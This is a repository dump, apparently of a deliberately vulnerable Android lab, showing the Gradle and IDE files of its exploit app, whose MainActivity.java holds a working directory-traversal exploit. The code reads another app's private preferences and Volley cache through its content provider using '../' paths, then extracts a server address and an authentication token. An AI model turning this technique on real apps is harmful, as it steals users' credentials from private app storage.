├── ExploitDirectoryTraversal ├── .gitignore ├── .idea │ ├── codeStyles │ │ └── Project.xml │ ├── gradle.xml │ ├── misc.xml │ ├── runConfigurations.xml │ └── vcs.xml ├── app │ ├── .gitignore │ ├── build.gradle │ ├── proguard-rules.pro │ └── src │ │ ├── androidTest │ │ └── java │ │ │ └── dev │ │ │ └── d0nut │ │ │ └── exploit │ │ │ └── exploitdirectorytraversal │ │ │ └── ExampleInstrumentedTest.java │ │ ├── main │ │ ├── AndroidManifest.xml │ │ ├── java │ │ │ └── dev │ │ │ │ └── d0nut │ │ │ │ └── exploit │ │ │ │ └── exploitdirectorytraversal │ │ │ │ └── MainActivity.java │ │ └── res │ │ │ ├── drawable-v24 │ │ │ └── ic_launcher_foreground.xml │ │ │ ├── drawable │ │ │ └── ic_launcher_background.xml │ │ │ ├── mipmap-anydpi-v26 │ │ │ ├── ic_launcher.xml │ │ │ └── ic_launcher_round.xml │ │ │ ├── mipmap-hdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-mdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xhdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xxhdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xxxhdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ └── values │ │ │ ├── colors.xml │ │ │ ├── strings.xml │ │ │ └── styles.xml │ │ └── test │ │ └── java │ │ └── dev │ │ └── d0nut │ │ └── exploit │ │ └── exploitdirectorytraversal │ │ └── ExampleUnitTest.java ├── build.gradle ├── gradle.properties ├── gradle │ └── wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat └── settings.gradle ├── FileApp ├── .gitignore ├── .idea │ ├── codeStyles │ │ └── Project.xml │ └── runConfigurations.xml ├── app │ ├── .gitignore │ ├── build.gradle │ ├── proguard-rules.pro │ └── src │ │ ├── androidTest │ │ └── java │ │ │ └── dev │ │ │ └── d0nut │ │ │ └── vuln │ │ │ └── fileapp │ │ │ └── ExampleInstrumentedTest.java │ │ ├── main │ │ ├── AndroidManifest.xml │ │ ├── java │ │ │ └── dev │ │ │ │ └── d0nut │ │ │ │ └── vuln │ │ │ │ └── fileapp │ │ │ │ ├── ConfigActivity.java │ │ │ │ ├── CustomContentProvider.java │ │ │ │ ├── FileApplication.java │ │ │ │ ├── FileListActivity.java │ │ │ │ └── LoginActivity.java │ │ └── res │ │ │ ├── drawable-v24 │ │ │ └── ic_launcher_foreground.xml │ │ │ ├── drawable │ │ │ ├── back.png │ │ │ ├── donut.png │ │ │ ├── folder.png │ │ │ ├── gear.png │ │ │ ├── ic_launcher_background.xml │ │ │ ├── icon_document.png │ │ │ ├── icon_excel.png │ │ │ ├── icon_image.png │ │ │ └── icon_pdf.png │ │ │ ├── layout │ │ │ ├── activity_config.xml │ │ │ ├── activity_files.xml │ │ │ ├── activity_main.xml │ │ │ └── item_file.xml │ │ │ ├── mipmap-anydpi-v26 │ │ │ ├── ic_launcher.xml │ │ │ └── ic_launcher_round.xml │ │ │ ├── mipmap-hdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-mdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xhdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xxhdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xxxhdpi │ │ │ ├── ic_launcher.png │ │ │ └── ic_launcher_round.png │ │ │ ├── values │ │ │ ├── colors.xml │ │ │ ├── strings.xml │ │ │ └── styles.xml │ │ │ └── xml │ │ │ └── filepaths.xml │ │ └── test │ │ └── java │ │ └── dev │ │ └── d0nut │ │ └── vuln │ │ └── fileapp │ │ └── ExampleUnitTest.java ├── build.gradle ├── gradle.properties ├── gradle │ └── wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat └── settings.gradle ├── README.md └── server ├── app.py └── requirements.txt /ExploitDirectoryTraversal/.gitignore: -------------------------------------------------------------------------------- 1 | *.iml 2 | .gradle 3 | /local.properties 4 | /.idea/caches 5 | /.idea/libraries 6 | /.idea/modules.xml 7 | /.idea/workspace.xml 8 | /.idea/navEditor.xml 9 | /.idea/assetWizardSettings.xml 10 | .DS_Store 11 | /build 12 | /captures 13 | .externalNativeBuild 14 | .cxx 15 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/.idea/codeStyles/Project.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | xmlns:android 14 | 15 | ^$ 16 | 17 | 18 | 19 |
20 |
21 | 22 | 23 | 24 | xmlns:.* 25 | 26 | ^$ 27 | 28 | 29 | BY_NAME 30 | 31 |
32 |
33 | 34 | 35 | 36 | .*:id 37 | 38 | http://schemas.android.com/apk/res/android 39 | 40 | 41 | 42 |
43 |
44 | 45 | 46 | 47 | .*:name 48 | 49 | http://schemas.android.com/apk/res/android 50 | 51 | 52 | 53 |
54 |
55 | 56 | 57 | 58 | name 59 | 60 | ^$ 61 | 62 | 63 | 64 |
65 |
66 | 67 | 68 | 69 | style 70 | 71 | ^$ 72 | 73 | 74 | 75 |
76 |
77 | 78 | 79 | 80 | .* 81 | 82 | ^$ 83 | 84 | 85 | BY_NAME 86 | 87 |
88 |
89 | 90 | 91 | 92 | .* 93 | 94 | http://schemas.android.com/apk/res/android 95 | 96 | 97 | ANDROID_ATTRIBUTE_ORDER 98 | 99 |
100 |
101 | 102 | 103 | 104 | .* 105 | 106 | .* 107 | 108 | 109 | BY_NAME 110 | 111 |
112 | 113 | 114 | 115 | 116 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/.idea/gradle.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 19 | 20 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 9 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/.idea/runConfigurations.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/build.gradle: -------------------------------------------------------------------------------- 1 | apply plugin: 'com.android.application' 2 | 3 | android { 4 | compileSdkVersion 29 5 | buildToolsVersion "29.0.3" 6 | 7 | defaultConfig { 8 | applicationId "dev.d0nut.exploit.exploitdirectorytraversal" 9 | minSdkVersion 24 10 | targetSdkVersion 29 11 | versionCode 1 12 | versionName "1.0" 13 | 14 | testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner" 15 | } 16 | 17 | buildTypes { 18 | release { 19 | minifyEnabled false 20 | proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro' 21 | } 22 | } 23 | 24 | } 25 | 26 | dependencies { 27 | implementation fileTree(dir: 'libs', include: ['*.jar']) 28 | 29 | implementation 'androidx.appcompat:appcompat:1.1.0' 30 | testImplementation 'junit:junit:4.12' 31 | androidTestImplementation 'androidx.test.ext:junit:1.1.1' 32 | androidTestImplementation 'androidx.test.espresso:espresso-core:3.2.0' 33 | } 34 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # You can control the set of applied configuration files using the 3 | # proguardFiles setting in build.gradle. 4 | # 5 | # For more details, see 6 | # http://developer.android.com/guide/developing/tools/proguard.html 7 | 8 | # If your project uses WebView with JS, uncomment the following 9 | # and specify the fully qualified class name to the JavaScript interface 10 | # class: 11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 12 | # public *; 13 | #} 14 | 15 | # Uncomment this to preserve the line number information for 16 | # debugging stack traces. 17 | #-keepattributes SourceFile,LineNumberTable 18 | 19 | # If you keep the line number information, uncomment this to 20 | # hide the original source file name. 21 | #-renamesourcefileattribute SourceFile 22 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/androidTest/java/dev/d0nut/exploit/exploitdirectorytraversal/ExampleInstrumentedTest.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.exploit.exploitdirectorytraversal; 2 | 3 | import android.content.Context; 4 | 5 | import androidx.test.platform.app.InstrumentationRegistry; 6 | import androidx.test.ext.junit.runners.AndroidJUnit4; 7 | 8 | import org.junit.Test; 9 | import org.junit.runner.RunWith; 10 | 11 | import static org.junit.Assert.*; 12 | 13 | /** 14 | * Instrumented test, which will execute on an Android device. 15 | * 16 | * @see Testing documentation 17 | */ 18 | @RunWith(AndroidJUnit4.class) 19 | public class ExampleInstrumentedTest { 20 | @Test 21 | public void useAppContext() { 22 | // Context of the app under test. 23 | Context appContext = InstrumentationRegistry.getInstrumentation().getTargetContext(); 24 | 25 | assertEquals("dev.d0nut.exploit.exploitdirectorytraversal", appContext.getPackageName()); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 3 | 4 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/java/dev/d0nut/exploit/exploitdirectorytraversal/MainActivity.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.exploit.exploitdirectorytraversal; 2 | 3 | import android.app.Activity; 4 | import android.net.Uri; 5 | import android.os.Bundle; 6 | import android.widget.Toast; 7 | 8 | import androidx.annotation.Nullable; 9 | 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.FileNotFoundException; 12 | import java.io.IOException; 13 | import java.io.InputStream; 14 | import java.util.regex.Matcher; 15 | import java.util.regex.Pattern; 16 | 17 | public class MainActivity extends Activity { 18 | @Override 19 | protected void onCreate(@Nullable Bundle savedInstanceState) { 20 | super.onCreate(savedInstanceState); 21 | 22 | String serverAddress = readServerAddress(); 23 | 24 | Toast.makeText(this, serverAddress, Toast.LENGTH_SHORT).show(); 25 | 26 | String endpoint = serverAddress + "/api/auth"; 27 | 28 | Toast.makeText(this, getToken(endpoint), Toast.LENGTH_SHORT).show(); 29 | } 30 | 31 | private String readServerAddress() { 32 | String preferencesFileContents = readRemoteFile("../shared_prefs/preferences.xml"); 33 | 34 | Pattern pattern = Pattern.compile("server_address\">([^<]+)"); 35 | Matcher matcher = pattern.matcher(preferencesFileContents); 36 | 37 | matcher.find(); 38 | 39 | return matcher.group(1); 40 | } 41 | 42 | private String getToken(String serverAddress) { 43 | String cacheFileContents = readRemoteFile("../cache/volley/" + calculateCacheFilename(serverAddress)); 44 | 45 | Pattern pattern = Pattern.compile("\"token\":\"([^\"]+)"); 46 | Matcher matcher = pattern.matcher(cacheFileContents); 47 | 48 | matcher.find(); 49 | 50 | return matcher.group(1); 51 | } 52 | 53 | private String calculateCacheFilename(String serverAddress) { 54 | String key = "1-" + serverAddress; 55 | 56 | int firstHalfLength = key.length() / 2; 57 | String localFilename = String.valueOf(key.substring(0, firstHalfLength).hashCode()); 58 | localFilename += String.valueOf(key.substring(firstHalfLength).hashCode()); 59 | return localFilename; 60 | } 61 | 62 | private String readRemoteFile(String path) { 63 | Uri contentUri = Uri.parse("content://dev.d0nut.vuln.fileapp.fileprovider/" + path); 64 | 65 | try { 66 | InputStream stream = getContentResolver().openInputStream(contentUri); 67 | ByteArrayOutputStream buffer = new ByteArrayOutputStream(); 68 | 69 | int nRead; 70 | byte[] bytes = new byte[16000]; 71 | 72 | while((nRead = stream.read(bytes,0, bytes.length)) != -1) { 73 | buffer.write(bytes); 74 | } 75 | 76 | return new String(buffer.toByteArray(), "UTF-8"); 77 | 78 | } catch (FileNotFoundException e) { 79 | e.printStackTrace(); 80 | } catch (IOException e) { 81 | e.printStackTrace(); 82 | } 83 | 84 | return null; 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/drawable-v24/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 15 | 18 | 21 | 22 | 23 | 24 | 30 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/drawable/ic_launcher_background.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 10 | 15 | 20 | 25 | 30 | 35 | 40 | 45 | 50 | 55 | 60 | 65 | 70 | 75 | 80 | 85 | 90 | 95 | 100 | 105 | 110 | 115 | 120 | 125 | 130 | 135 | 140 | 145 | 150 | 155 | 160 | 165 | 170 | 171 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-hdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-mdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/values/colors.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #6200EE 4 | #3700B3 5 | #03DAC5 6 | 7 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | ExploitLFI 3 | 4 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/main/res/values/styles.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/app/src/test/java/dev/d0nut/exploit/exploitdirectorytraversal/ExampleUnitTest.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.exploit.exploitdirectorytraversal; 2 | 3 | import org.junit.Test; 4 | 5 | import static org.junit.Assert.*; 6 | 7 | /** 8 | * Example local unit test, which will execute on the development machine (host). 9 | * 10 | * @see Testing documentation 11 | */ 12 | public class ExampleUnitTest { 13 | @Test 14 | public void addition_isCorrect() { 15 | assertEquals(4, 2 + 2); 16 | } 17 | } -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/build.gradle: -------------------------------------------------------------------------------- 1 | // Top-level build file where you can add configuration options common to all sub-projects/modules. 2 | 3 | buildscript { 4 | 5 | repositories { 6 | google() 7 | jcenter() 8 | 9 | } 10 | dependencies { 11 | classpath 'com.android.tools.build:gradle:3.6.3' 12 | 13 | 14 | // NOTE: Do not place your application dependencies here; they belong 15 | // in the individual module build.gradle files 16 | } 17 | } 18 | 19 | allprojects { 20 | repositories { 21 | google() 22 | jcenter() 23 | 24 | } 25 | } 26 | 27 | task clean(type: Delete) { 28 | delete rootProject.buildDir 29 | } 30 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/gradle.properties: -------------------------------------------------------------------------------- 1 | # Project-wide Gradle settings. 2 | # IDE (e.g. Android Studio) users: 3 | # Gradle settings configured through the IDE *will override* 4 | # any settings specified in this file. 5 | # For more details on how to configure your build environment visit 6 | # http://www.gradle.org/docs/current/userguide/build_environment.html 7 | # Specifies the JVM arguments used for the daemon process. 8 | # The setting is particularly useful for tweaking memory settings. 9 | org.gradle.jvmargs=-Xmx1536m 10 | # When configured, Gradle will run in incubating parallel mode. 11 | # This option should only be used with decoupled projects. More details, visit 12 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects 13 | # org.gradle.parallel=true 14 | # AndroidX package structure to make it clearer which packages are bundled with the 15 | # Android operating system, and which are packaged with your app's APK 16 | # https://developer.android.com/topic/libraries/support-library/androidx-rn 17 | android.useAndroidX=true 18 | # Automatically convert third-party libraries to use AndroidX 19 | android.enableJetifier=true 20 | 21 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/ExploitDirectoryTraversal/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | #Sat May 02 15:38:39 PDT 2020 2 | distributionBase=GRADLE_USER_HOME 3 | distributionPath=wrapper/dists 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | distributionUrl=https\://services.gradle.org/distributions/gradle-5.6.4-all.zip 7 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/gradlew: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | ############################################################################## 4 | ## 5 | ## Gradle start up script for UN*X 6 | ## 7 | ############################################################################## 8 | 9 | # Attempt to set APP_HOME 10 | # Resolve links: $0 may be a link 11 | PRG="$0" 12 | # Need this for relative symlinks. 13 | while [ -h "$PRG" ] ; do 14 | ls=`ls -ld "$PRG"` 15 | link=`expr "$ls" : '.*-> \(.*\)$'` 16 | if expr "$link" : '/.*' > /dev/null; then 17 | PRG="$link" 18 | else 19 | PRG=`dirname "$PRG"`"/$link" 20 | fi 21 | done 22 | SAVED="`pwd`" 23 | cd "`dirname \"$PRG\"`/" >/dev/null 24 | APP_HOME="`pwd -P`" 25 | cd "$SAVED" >/dev/null 26 | 27 | APP_NAME="Gradle" 28 | APP_BASE_NAME=`basename "$0"` 29 | 30 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 31 | DEFAULT_JVM_OPTS="" 32 | 33 | # Use the maximum available, or set MAX_FD != -1 to use that value. 34 | MAX_FD="maximum" 35 | 36 | warn () { 37 | echo "$*" 38 | } 39 | 40 | die () { 41 | echo 42 | echo "$*" 43 | echo 44 | exit 1 45 | } 46 | 47 | # OS specific support (must be 'true' or 'false'). 48 | cygwin=false 49 | msys=false 50 | darwin=false 51 | nonstop=false 52 | case "`uname`" in 53 | CYGWIN* ) 54 | cygwin=true 55 | ;; 56 | Darwin* ) 57 | darwin=true 58 | ;; 59 | MINGW* ) 60 | msys=true 61 | ;; 62 | NONSTOP* ) 63 | nonstop=true 64 | ;; 65 | esac 66 | 67 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 68 | 69 | # Determine the Java command to use to start the JVM. 70 | if [ -n "$JAVA_HOME" ] ; then 71 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 72 | # IBM's JDK on AIX uses strange locations for the executables 73 | JAVACMD="$JAVA_HOME/jre/sh/java" 74 | else 75 | JAVACMD="$JAVA_HOME/bin/java" 76 | fi 77 | if [ ! -x "$JAVACMD" ] ; then 78 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 79 | 80 | Please set the JAVA_HOME variable in your environment to match the 81 | location of your Java installation." 82 | fi 83 | else 84 | JAVACMD="java" 85 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 86 | 87 | Please set the JAVA_HOME variable in your environment to match the 88 | location of your Java installation." 89 | fi 90 | 91 | # Increase the maximum file descriptors if we can. 92 | if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then 93 | MAX_FD_LIMIT=`ulimit -H -n` 94 | if [ $? -eq 0 ] ; then 95 | if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then 96 | MAX_FD="$MAX_FD_LIMIT" 97 | fi 98 | ulimit -n $MAX_FD 99 | if [ $? -ne 0 ] ; then 100 | warn "Could not set maximum file descriptor limit: $MAX_FD" 101 | fi 102 | else 103 | warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" 104 | fi 105 | fi 106 | 107 | # For Darwin, add options to specify how the application appears in the dock 108 | if $darwin; then 109 | GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" 110 | fi 111 | 112 | # For Cygwin, switch paths to Windows format before running java 113 | if $cygwin ; then 114 | APP_HOME=`cygpath --path --mixed "$APP_HOME"` 115 | CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` 116 | JAVACMD=`cygpath --unix "$JAVACMD"` 117 | 118 | # We build the pattern for arguments to be converted via cygpath 119 | ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` 120 | SEP="" 121 | for dir in $ROOTDIRSRAW ; do 122 | ROOTDIRS="$ROOTDIRS$SEP$dir" 123 | SEP="|" 124 | done 125 | OURCYGPATTERN="(^($ROOTDIRS))" 126 | # Add a user-defined pattern to the cygpath arguments 127 | if [ "$GRADLE_CYGPATTERN" != "" ] ; then 128 | OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" 129 | fi 130 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 131 | i=0 132 | for arg in "$@" ; do 133 | CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` 134 | CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option 135 | 136 | if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition 137 | eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` 138 | else 139 | eval `echo args$i`="\"$arg\"" 140 | fi 141 | i=$((i+1)) 142 | done 143 | case $i in 144 | (0) set -- ;; 145 | (1) set -- "$args0" ;; 146 | (2) set -- "$args0" "$args1" ;; 147 | (3) set -- "$args0" "$args1" "$args2" ;; 148 | (4) set -- "$args0" "$args1" "$args2" "$args3" ;; 149 | (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; 150 | (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; 151 | (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; 152 | (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; 153 | (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; 154 | esac 155 | fi 156 | 157 | # Escape application args 158 | save () { 159 | for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done 160 | echo " " 161 | } 162 | APP_ARGS=$(save "$@") 163 | 164 | # Collect all arguments for the java command, following the shell quoting and substitution rules 165 | eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" 166 | 167 | # by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong 168 | if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then 169 | cd "$(dirname "$0")" 170 | fi 171 | 172 | exec "$JAVACMD" "$@" 173 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/gradlew.bat: -------------------------------------------------------------------------------- 1 | @if "%DEBUG%" == "" @echo off 2 | @rem ########################################################################## 3 | @rem 4 | @rem Gradle startup script for Windows 5 | @rem 6 | @rem ########################################################################## 7 | 8 | @rem Set local scope for the variables with windows NT shell 9 | if "%OS%"=="Windows_NT" setlocal 10 | 11 | set DIRNAME=%~dp0 12 | if "%DIRNAME%" == "" set DIRNAME=. 13 | set APP_BASE_NAME=%~n0 14 | set APP_HOME=%DIRNAME% 15 | 16 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 17 | set DEFAULT_JVM_OPTS= 18 | 19 | @rem Find java.exe 20 | if defined JAVA_HOME goto findJavaFromJavaHome 21 | 22 | set JAVA_EXE=java.exe 23 | %JAVA_EXE% -version >NUL 2>&1 24 | if "%ERRORLEVEL%" == "0" goto init 25 | 26 | echo. 27 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 28 | echo. 29 | echo Please set the JAVA_HOME variable in your environment to match the 30 | echo location of your Java installation. 31 | 32 | goto fail 33 | 34 | :findJavaFromJavaHome 35 | set JAVA_HOME=%JAVA_HOME:"=% 36 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 37 | 38 | if exist "%JAVA_EXE%" goto init 39 | 40 | echo. 41 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 42 | echo. 43 | echo Please set the JAVA_HOME variable in your environment to match the 44 | echo location of your Java installation. 45 | 46 | goto fail 47 | 48 | :init 49 | @rem Get command-line arguments, handling Windows variants 50 | 51 | if not "%OS%" == "Windows_NT" goto win9xME_args 52 | 53 | :win9xME_args 54 | @rem Slurp the command line arguments. 55 | set CMD_LINE_ARGS= 56 | set _SKIP=2 57 | 58 | :win9xME_args_slurp 59 | if "x%~1" == "x" goto execute 60 | 61 | set CMD_LINE_ARGS=%* 62 | 63 | :execute 64 | @rem Setup the command line 65 | 66 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 67 | 68 | @rem Execute Gradle 69 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% 70 | 71 | :end 72 | @rem End local scope for the variables with windows NT shell 73 | if "%ERRORLEVEL%"=="0" goto mainEnd 74 | 75 | :fail 76 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 77 | rem the _cmd.exe /c_ return code! 78 | if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 79 | exit /b 1 80 | 81 | :mainEnd 82 | if "%OS%"=="Windows_NT" endlocal 83 | 84 | :omega 85 | -------------------------------------------------------------------------------- /ExploitDirectoryTraversal/settings.gradle: -------------------------------------------------------------------------------- 1 